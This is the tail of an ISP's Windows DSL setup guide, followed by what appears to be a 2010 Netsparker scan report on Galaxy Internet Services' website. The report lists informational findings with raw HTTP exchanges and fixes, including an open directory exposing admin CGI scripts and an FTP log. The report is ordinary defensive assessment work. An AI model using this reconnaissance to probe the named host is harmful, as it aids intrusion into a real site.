255.255.255.0<p>Default Gateway: 192.168.100.1<p>DNS Servers: 208.218.130.4 and 208.218.130.5<p><p>If you are not running your own mail server, and rely on Galaxy for emailservices, use this information:<p>Incoming Mail Server: pop.gis.net<p>Outgoing Mail Server: smtp.gis.net<p>So lets get started!<p> 1. Close all Programs on your computer, save all information.<p> 2. Click on the Start button in the lower left hand corner of the screen.<p> 3. Choose Settings<p> 4. Chose Network and Dial Up Connections<p><img src="1.png"><p> 5. Double Click on Make New Connection.<p><img src="2.png"><p> 6. The Connection Wizard should start. Click Next.<p><img src="3.png"><p> 7. Next, you need to choose your connection type. Just choose Dial-up to the Internet. Click Next.<p><img src="4.png"><p> 8. The Internet Connection Wizard screen should appear. 
Select the third choice I want to set up my Internet Connection Manually, or I want to connect through a local area network [LAN]. Then Click Next.<p><img src="5.png"><p> 9. Choose I connect through a Local Area Network [LAN]. Then click Next.<p><img src="6.png"><p>10. Click Next.<p><img src="7.png"><p>11.The wizard should be complete now. Uncheck the check box and then hitFinish<p><img src="8.png"><p> 12. When you reopen Network and Dial-up Connections, you should now see and Icon labeled Local Area Connection. Right Click on the Icon and select Properties.<p><img src="9.png"><p> 13. Click on TCP/IP and then hit Properties.<p> 14. Enter the following numbers in the Use the following IP Address: 192.168.100.2, and with a Subnet Mask of 255.255.255.0. The Default Gateway should be 192.168.100.1<p><img src="10.png"><p> 15. Enter the following number in the same Use the following DNS server addresses: 208.218.130.4, 208.218.130.5<p> 16. Click the OK button at the bottom of the window.<p> 17. Click OK again.<p> 18. You should be all set. To make sure the connection starts properly, please Restart your computer now.<p>You can test your GalaxyDSL connection by running a web browser andvisiting various Web sites.<p>To test if your computer is properly communicating with your GalaxyDSLrouter, you can run the ping command from a DOS window, specifying yourrouter’s IP address (same as your default gateway) as an argument to ping.<p><img src="11.png"><p>If your computer still attempts to connect to the Internet via the phoneline after finishing this setup, follow these simple steps.<p> 1. Click on the Start button in the lower left hand corner of the screen.<p> 2. Choose Settings<p>3. Chose Control Panel<p> 4. Chose Internet Options<p><img src="12.png"><p>5. You will see the General tab in front of you. Chose Connections.<p>6. Make sure that Never dial a connection is selected.<p>7. Click on LAN Settings<p> 8. 
Make sure Automatically Detect Settings is selected.<p><img src="13.png"><p> 9. Click on OK<p> 10. Click on OK again.<p>All set!</body></html>
Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /support/

/support/ CONFIRMED

http://www.gis.net/support/

Request

GET /support/ HTTP/1.1
Referer: http://www.gis.net/support/dialup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Sat, 25 Sep 2010 00:54:12 GMT
Server: Apache
Content-Length: 220
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /support/index.htmlon this server.</p></body></html>
Directory Listing (Apache)

1 TOTAL
INFORMATION
The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

  1. See the remedy for the solution.
  2. Configure the web server to disallow directory listing requests.
  3. This can also be caused by web server products that do not have the latest security patches. Ensure that all of the patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one:
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the Indexes option from the configuration. Do not forget to remove MultiViews as well.

- /~sotis/cgi-bin/

/~sotis/cgi-bin/

http://www.gis.net/~sotis/cgi-bin/

Request

GET /~sotis/cgi-bin/ HTTP/1.1
Referer: http://www.gis.net/~sotis/cgi-bin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:42 GMT
Server: Apache
Content-Length: 1117
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /~sotis/cgi-bin</title> </head> <body><h1>Index of /~sotis/cgi-bin</h1><pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icons/back.gif" alt="[DIR]"> <a href="/~sotis/">Parent Directory</a> - <img src="/icons/unknown.gif" alt="[ ]"> <a href="crazyadmin.cgi">crazyadmin.cgi</a> 02-Nov-1999 15:55 118K <img src="/icons/script.gif" alt="[ ]"> <a href="crazyadmin.conf">crazyadmin.conf</a> 02-Nov-1999 15:55 13 <img src="/icons/unknown.gif" alt="[ ]"> <a href="crazywwwboard.cgi">crazywwwboard.cgi</a> 02-Nov-1999 15:55 202K <img src="/icons/script.gif" alt="[ ]"> <a href="crazywwwboard.conf">crazywwwboard.conf</a> 02-Nov-1999 15:55 26K <img src="/icons/unknown.gif" alt="[ ]"> <a href="ws_ftp.log">ws_ftp.log</a> 02-Nov-1999 15:55 3.9K <hr></pre></body></html>
MS Office Information Disclosure

2 TOTAL
INFORMATION
Netsparker found HTML files that were produced by the MS Office suite. MS Office has appended user-related information to the documents.

Impact

This information can be used for social engineering attacks.

Remedy

Remove all sensitive information from your HTML documents.
- /support/windows/win2000/index.html

/support/windows/win2000/index.html

http://www.gis.net/support/windows/win2000/index.html

Request

GET /support/windows/win2000/index.html HTTP/1.1
Referer: http://www.gis.net/support/windows/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:33 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 21995
Content-Type: text/html


<html xmlns:v="urn:schemas-microsoft-com:vml"xmlns:o="urn:schemas-microsoft-com:office:office"xmlns:w="urn:schemas-microsoft-com:office:word"xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type content="text/html; charset=windows-1252"><meta name=ProgId content=Word.Document><meta name=Generator content="Microsoft Word 9"><meta name=Originator content="Microsoft Word 9"><link rel=File-List href="./win2000_files/filelist.xml"><!--[if !mso]><style>v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}</style><![endif]--><title> </title><!--[if gte mso 9]><xml> <o:DocumentProperties> <o:Author>The Steve Man</o:Author> <o:Template>Normal</o:Template> <o:LastAuthor>The Steve Man</o:LastAuthor> <o:Revision>1</o:Revision> <o:TotalTime>35</o:TotalTime> <o:Created>2000-03-30T17:05:00Z</o:Created> <o:LastSaved>2000-03-30T17:40:00Z</o:LastSaved> <o:Pages>7</o:Pages> <o:Words>477</o:Words> <o:Characters>2722</o:Characters> <o:Company>Galaxy Internet Services</o:Company> <o:Lines>22</o:Lines> <o:Paragraphs>5</o:Paragraphs> <o:CharactersWithSpaces>3342</o:CharactersWithSpaces> <o:Version>9.2720</o:Version> </o:DocumentProperties></xml><![endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument></xml><![endif]--><style><!-- /* Font Definitions */@font-face {font-family:"Copperplate Gothic Bold"; panose-1:2 14 7 5 2 2 6 2 4 4; mso-font-charset:0; mso-generic-font-family:swiss; mso-font-pitch:variable; mso-font-signature:3 0 0 0 1 0;} /* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; color:windowtext;}h1 {mso-style-next:Normal; margin-right:0in; mso-margin-top-alt:auto; mso-margin-bottom-alt:auto; margin-left:.25in; 
mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:1; font-size:14.0pt; mso-bidi-font-size:10.0pt; font-family:"Copperplate Gothic Bold"; mso-bidi-font-family:Arial; color:windowtext; mso-font-kerning:0pt; font-weight:bold;}h2 {mso-style-next:Normal; margin:0in; margin-bottom:.0001pt; mso-pagination:widow-orphan; page-break-after:avoid; mso-outline-level:2; font-size:16.0pt; mso-bidi-font-size:12.0pt; font-family:"Copperplate Gothic Bold"; color:navy; font-weight:normal;}p {margin-right:0in; mso-margin-top-alt:auto; mso-margin-bottom-alt:auto; margin-left:0in; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman"; color:black;}@page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;}div.Section1 {page:Section1;} /* List Definitions */@list l0 {mso-list-id:2063291729; mso-list-type:hybrid; mso-list-template-ids:2050119372 849147106 544879068 967185042 -229215696 797195612 1475890132 1720722532 1460013210 -2143252980;}@list l0:level1 {mso-level-tab-stop:.5in; mso-level-number-position:left; text-indent:-.25in;}ol {margin-bottom:0in;}ul {margin-bottom:0in;}--></style></head><body lang=EN-US style='tab-interval:.5in'><div class=Section1><h2><span style="mso-spacerun: yes">�������� </span><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter"/> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0"/> <v:f eqn="sum @0 1 0"/> <v:f eqn="sum 0 0 @1"/> <v:f eqn="prod @2 1 2"/> <v:f eqn="prod @3 21600 pixelWidth"/> <v:f eqn="prod @3 21600 pixelHeight"/> <v:f eqn="sum @0 0 1"/> <v:f eqn="prod @6 1 2"/> <v:f eqn="prod @7 21600 pixelWidth"/> <v:f eqn="sum @8 21600 0"/> <v:f eqn="prod @7 21600 pixelHeight"/> <v:f eqn="sum @10 21600 0"/> </v:formulas> <v:path o:extrusionok="f" 
gradientshapeok="t" o:connecttype="rect"/> <o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_i1097" type="#_x0000_t75" style='width:87.75pt; height:63.75pt'> <v:imagedata src="./win2000_files/image001.gif" o:title="mscom_w2000"/></v:shape><![endif]--><![if !vml]><img width=117 height=85src="./win2000_files/image001.gif" v:shapes="_x0000_i1097"><![endif]></h2><h2><span style="mso-spacerun: yes">��������� </span>Windows <spanstyle='color:red'>2000</span> Setup</h2><p class=MsoNormal><![if !supportEmptyParas]>&nbsp;<![endif]><o:p></o:p></p><p class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto;margin-left:.5in;text-indent:-.25in;mso-list:l0 level1 lfo1'><![if !supportLists]><spanstyle='font-size:10.0pt;font-family:Arial'>1.<span style='font:7.0pt "Times New Roman"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span></span><![endif]><span style='font-size:10.0pt;font-family:Arial'>Clickthe <b>Start</b> button, click <b>Settings</b>, and choose <b>Control Panel</b>.<o:p></o:p></span></p><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1061" type="#_x0000_t75" alt="" style='width:289.5pt;height:228pt'> <v:imagedata src="./win2000_files/image002.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A001.gif"/></v:shape><![endif]--><![if !vml]><img width=386 height=304src="./win2000_files/image002.gif" v:shapes="_x0000_i1061"><![endif]><o:p></o:p></span></p><ol start=2 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Double-click the <b>Network and Dial-up Connections</b> icon. 
<o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1062" type="#_x0000_t75" alt="" style='width:258pt;height:236.25pt'> <v:imagedata src="./win2000_files/image003.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A002.gif"/></v:shape><![endif]--><![if !vml]><img width=344 height=315src="./win2000_files/image003.gif" v:shapes="_x0000_i1062"><![endif]><o:p></o:p></span></p><ol start=3 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Double-click the <b>Make New Connection</b> icon. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1063" type="#_x0000_t75" alt="" style='width:258pt;height:236.25pt'> <v:imagedata src="./win2000_files/image004.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A003.gif"/></v:shape><![endif]--><![if !vml]><img width=344 height=315src="./win2000_files/image004.gif" v:shapes="_x0000_i1063"><![endif]><o:p></o:p></span></p><ol start=4 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. 
<o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1064" type="#_x0000_t75" alt="" style='width:377.25pt;height:288.75pt'> <v:imagedata src="./win2000_files/image005.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A004.gif"/></v:shape><![endif]--><![if !vml]><img width=503 height=385src="./win2000_files/image005.gif" v:shapes="_x0000_i1064"><![endif]><o:p></o:p></span></p><ol start=5 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>Dial-up to the Internet</b>. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1065" type="#_x0000_t75" alt="" style='width:377.25pt;height:288.75pt'> <v:imagedata src="./win2000_files/image006.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A005.gif"/></v:shape><![endif]--><![if !vml]><img width=503 height=385src="./win2000_files/image006.gif" v:shapes="_x0000_i1065"><![endif]><o:p></o:p></span></p><ol start=7 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>I want to set up my Internet connection manually.</b><o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. 
<o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1066" type="#_x0000_t75" alt="" style='width:406.5pt;height:330.75pt'> <v:imagedata src="./win2000_files/image007.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A006.gif"/></v:shape><![endif]--><![if !vml]><img width=542 height=441src="./win2000_files/image007.gif" v:shapes="_x0000_i1066"><![endif]><o:p></o:p></span></p><ol start=9 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Select <b>I connect through a phone line and a modem</b>. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1067" type="#_x0000_t75" alt="" style='width:406.5pt;height:330.75pt'> <v:imagedata src="./win2000_files/image008.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A007.gif"/></v:shape><![endif]--><![if !vml]><img width=542 height=441src="./win2000_files/image008.gif" v:shapes="_x0000_i1067"><![endif]><o:p></o:p></span></p><ol start=11 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Area Code</b> field, type the area code of your local access number. 
<o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'>In the <b>Telephone number</b> field, type your local access number. </li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><!--[if gte vml 1]><v:shape id="_x0000_i1083" type="#_x0000_t75" alt="" style='width:406.5pt;height:330.75pt'> <v:imagedata src="./win2000_files/image009.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A008.gif"/></v:shape><![endif]--><![if !vml]><img width=542 height=441src="./win2000_files/image009.gif" v:shapes="_x0000_i1083"><![endif]><spanstyle='font-size:10.0pt;font-family:Arial'><o:p></o:p></span></p><ol start=14 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>User name</b> field, type your Galaxy username. Be sure to use all lower case letters. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Password</b> field, type your Galaxy password. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. 
<o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1085" type="#_x0000_t75" style='width:406.5pt;height:330.75pt'> <v:imagedata src="./win2000_files/image010.gif" o:title="user"/></v:shape><![endif]--><![if !vml]><img width=542 height=441src="./win2000_files/image010.gif" v:shapes="_x0000_i1085"><![endif]><o:p></o:p></span></p><ol start=17 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Connection Name</b> field, type </span><b><span style='font-size:10.0pt;font-family:"Courier New"'>Galaxy</span></b><span style='font-size:10.0pt;font-family:Arial'> <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. <o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1087" type="#_x0000_t75" style='width:406.5pt;height:330.75pt'> <v:imagedata src="./win2000_files/image011.gif" o:title="name"/></v:shape><![endif]--><![if !vml]><img width=542 height=441src="./win2000_files/image011.gif" v:shapes="_x0000_i1087"><![endif]><o:p></o:p></span></p><ol start=19 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Yes</b> radio button in the <b>Do you want to set up an Internet mail account now</b> area. <o:p></o:p></span></li> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>Click the <b>Next</b> button. 
<o:p></o:p></span></li></ol><p style='margin-left:.5in'><span style='font-size:10.0pt;font-family:Arial'><!--[if gte vml 1]><v:shape id="_x0000_i1073" type="#_x0000_t75" alt="" style='width:406.5pt;height:330.75pt'> <v:imagedata src="./win2000_files/image012.gif" o:href="http://help.earthlink.net/techsupport/xmldocs/windows_9x_nt/dialers/dial-up_connections/0577_A013.gif"/></v:shape><![endif]--><![if !vml]><img width=542 height=441src="./win2000_files/image012.gif" v:shapes="_x0000_i1073"><![endif]><o:p></o:p></span></p><ol start=21 type=1> <li class=MsoNormal style='mso-margin-top-alt:auto;mso-margin-bottom-alt:auto; mso-list:l0 level1 lfo1;tab-stops:list .5in'><span style='font-size:10.0pt; font-family:Arial'>In the <b>Display Name</b> field, type ..
- /support/windows/win2000/

/support/windows/win2000/

http://www.gis.net/support/windows/win2000/

Request

GET /support/windows/win2000/ HTTP/1.1
Referer: http://www.gis.net/support/windows/win2000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:35 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 21995
Content-Type: text/html


E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and brute-force tools. Furthermore, valid email addresses may lead to social engineering attacks.

Remedy

Use generic email addresses such as contact@ or info@ for general communications, and remove user- or person-specific e-mail addresses from the web site. Should this be required, use submission forms for this purpose.

External References

- /bizdsl.html

http://www.gis.net/bizdsl.html

Found E-mails

email@yourname.com

Request

GET /bizdsl.html HTTP/1.1
Referer: http://www.gis.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.gis.net
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 25 Sep 2010 00:54:07 GMT
Server: Apache
Accept-Ranges: bytes
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>Galaxy Internet Services: Business DSL Internet Access</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <link href="galaxy.css" type="text/css" rel="stylesheet" /> <link rel="shortcut icon" type="image/ico" href="favicon.ico" /> <script type="text/javascript"><!--//--><![CDATA[//><!--sfHover = function() { var sfEls = document.getElementById("nav").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfhover\\b"), ""); } }}if (window.attachEvent) window.attachEvent("onload", sfHover);function popupPage() {var page = "loading.html";windowprops = "height=320,width=380,location=no,"+ "scrollbars=yes,menubar=yes,toolbars=no,resizable=yes";window.open(page, "Popup", windowprops);}//--><!]]></script></head><body><div id="middle"> <div id="header"> <div id="logo"> <div style="width: 190px; float: left;"> <a href="index.html"><img src="./images/galaxylogo.gif" style="border: 0px;" alt="Galaxy Internet Services" /></a> </div> </div> <div id="navigation"> <ul id="nav"> <li><a href="#">Residential</a> <ul> <li><a href="dialup.html">Dialup</a></li> <li><a href="resdsl.html">DSL</a></li> <li><a href="http://www.galaxysavesmoney.com/tripleplay_gisnet.html">Triple Play</a></li> <li><a href="wifi.html">Wi-Fi</a></li> <li><a href="resphone.html">Broadband Phone</a></li> </ul> </li> <li><a href="#">Business</a> <ul> <li><a href="dialup.html">Dialup</a></li> <li><a href="bizdsl.html">DSL</a></li> <li><a href="leasedlines.html">Leased Lines</a></li> <li><a href="isdn.html">ISDN</a></li> <!-- <li><a href="#" class="parent">Wireless</a> <ul> --> <li><a 
href="wifi.html">Wi-Fi</a></li> <li><a href="wireless.html">Fixed Wireless</a></li> <!-- </ul> </li> --> <li><a href="bizphone.html">Broadband Phone</a></li> <li><a href="websitehosting.html">Website Hosting</a></li> <li><a href="colo.html">Colocation</a></li> </ul> </li> <li><a href="#">Support</a> <ul> <li><a href="support/dialup.html">Dialup</a></li> <li><a href="support/dsl.html">DSL</a></li> <li><a href="support/email.html">Email</a></li> <li><a href="support/phone.html">Broadband Phone</a></li> <li><a href="support/webhosting.html">Website Hosting</a></li> <li><a href="http://cp.gis.net">Control Panel</a></li> <li><a href="support/downloads.html">Downloads</a></li> </ul> </li> <li><a href="#">About</a> <ul> <li><a href="network.html">Our Network</a></li> <li><a href="jobs.html">Jobs</a></li> <li><a href="press.html">Press</a></li> </ul> </li> </ul> </div> </div> <div id="contentbox"> <div id="servicetext"> <div style="padding: 15px;"> <h2>Standard Business DSL</h2> <p> Speed up your internet connection with DSL! Digital Subscriber Line, a proven technology that uses existing copper wires to provide you with dedicated, fast internet access. Because it's digital, not analog, you can enjoy 2X T-1 like speeds up to 50 times faster than your current modem. 
</p> <b>Our Business DSL features:</b> <ul> <li>Free Activation</li> <li>Free DSL Modem*</li> <li>Unlimited, Always-On High Speed Internet Service</li> <li>4X T1 Download Speeds of Up to 7.1Mbps</li> <li>Free Domain Hosting Services</li> <ul> <li>Have your own website address, www.yourname.com</li> <li>Get email@yourname.com</li> <li>We support all top level domains, .com, .org, .net, .name, .us, etc.</li> </ul> <li>10 Email Boxes</li> <li>50 MB of Web Space</li> <li>Dial-Up Account with 20 Free Hours - for Travel or Backup</li> <li>Free Pop-Up Blocker Professional</li> <li>SPAM Filtering</li> <li>Unlimited, Free Technical Support</li> </ul> <p style="text-align: center;"> Available in Massachusetts, New Hampshire, New York, &amp; Rhode Island </p><p> <table class="servicetable"> <tr class="hrow"><td>Speed</td><td>Email</td><td>Web Hosting</td><td>Starting At</td><td>Setup Fee</td></tr> <tr class="irow"><td>Up to 1.0Mbps</td><td>10 Addresses</td><td>50 Megabytes</td><td>$34.95</td><td>24.95</td></tr> <tr class="irow"><td>Up to 3.0Mbps</td><td>10 Addresses</td><td>50 Megabytes</td><td>$69.95</td><td>24.95</td></tr> <tr class="irow"><td>Up to 5.0Mbps</td><td>10 Addresses</td><td>50 Megabytes</td><td>$82.95</td><td>24.95</td></tr> <tr class="irow"><td>Up to 7.1Mbps</td><td>10 Addresses</td><td>50 Megabytes</td><td>$90.95</td><td>24.95</td></tr> </table> <p style="font-size: 8pt;"> * $14.95 Shipping and Handling Fee. Additional charges, taxes and terms apply.</p><p style="font-weight: bold;">Call for more information, or <a href="https://secure.gis.net/dslcombo_business.html">Signup Online</a> for Business DSL.</p> </p> <hr> <h2>Premium Business DSL</h2> <p> Speed up your internet connection with DSL!Digital Subscriber Line, a proven technology that uses existing copper wires to provide you with dedicated, fast internet access. 
Because it's digital, not analog, you can enjoy T-1 like speeds up to 50 times faster than your current modem.</p>All our Premium Business DSL accounts include the following:<ul> <li>FREE Standard Web Hosting</li> <li>FREE 10 Email boxes</li> <li>FREE Unlimited Dial Up Account</li> <li>1 or 2 Year Term Commitment*</li></ul>*(Commences from time packets can be passed through DSL router)<table class="servicetable"><tr class="hrow"><td>Speed</td><td>Email</td><td>Web Hosting</td><td>Starting At</td><td>Setup Fee</td></tr><tr class="irow"><td>Up to 384k</td><td>10 Addresses</td><td>50 Megabytes</td><td>$149</td><td>Yes</td></tr><tr class="irow"><td>512k</td><td>10 Addresses</td><td>50 Megabytes</td><td>$199</td><td>Yes</td></tr><tr class="irow"><td>768k</td><td>10 Addresses</td><td>50 Megabytes</td><td>$249</td><td>Yes</td></tr><tr class="irow"><td>1.1M</td><td>10 Addresses</td><td>50 Megabytes</td><td>$299</td><td>Yes</td></tr><tr class="irow"><td>1.5M</td><td>10 Addresses</td><td>50 Megabytes</td><td>$399</td><td>Yes</td></tr><tr class="irow"><td>2.0M</td><td>10 Addresses</td><td>50 Megabytes</td><td>$489</td><td>Yes</td></tr></table><p style="font-weight: bold;">Call for more information, or fill out our <a href="http://www.gis.net/cgi-bin/businessquote.cgi?regarding=Business+Quote">Quote Request</a> Form. </p> </div> </div> <div id="sidetext"><img src="images/phonewithcoffee.jpg" style="border: 1px solid #999;" alt="Stopwatch" /></div> <div id="credits"> <p style="text-align: center;"> <b 